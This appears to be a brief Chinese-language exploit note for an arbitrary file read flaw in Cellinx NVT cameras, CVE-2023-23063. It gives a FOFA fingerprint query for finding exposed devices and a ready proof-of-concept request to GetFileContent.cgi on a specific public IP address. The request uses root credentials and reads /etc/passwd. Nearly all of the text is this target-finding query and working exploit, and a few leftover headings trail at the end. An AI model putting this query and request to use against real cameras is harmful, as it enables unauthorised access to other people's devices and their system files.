CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞（CVE-2023-23063）

fofa

body="local/NVT-string.js"

poc

http://1.222.228.4/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605

fofa​

poc​

fofa

poc